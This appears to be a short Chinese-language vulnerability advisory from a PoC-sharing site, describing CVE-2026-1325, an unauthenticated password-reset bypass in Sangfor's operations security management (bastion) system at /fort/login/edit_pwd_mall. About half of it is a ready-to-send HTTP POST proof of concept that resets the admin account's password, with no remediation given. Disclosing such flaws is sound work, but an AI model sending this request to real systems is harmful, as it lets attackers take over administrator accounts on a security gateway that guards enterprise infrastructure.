深信服运维安全管理系统 /fort/login/edit_pwd_mall 权限绕过漏洞(CVE-2026-1325)

2026-02-06 深信服运维安全管理系统 PoC Public

Description

深信服运维安全管理系统是一款用于保障企业IT运维操作安全的集中管控平台。该系统的/fort/login/edit_pwd_mall功能存在密码恢复机制设计缺陷,导致密码重置流程存在安全弱点。攻击者无需身份验证即可远程利用此缺陷,从而可能导致非授权用户重置其他用户的账户密码,进而接管相关账户权限,对运维安全管理造成严重威胁。

PoC

POST /fort/login/edit_pwd_mall HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

newpwd=&repwd=&isflag=true&account=admin

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities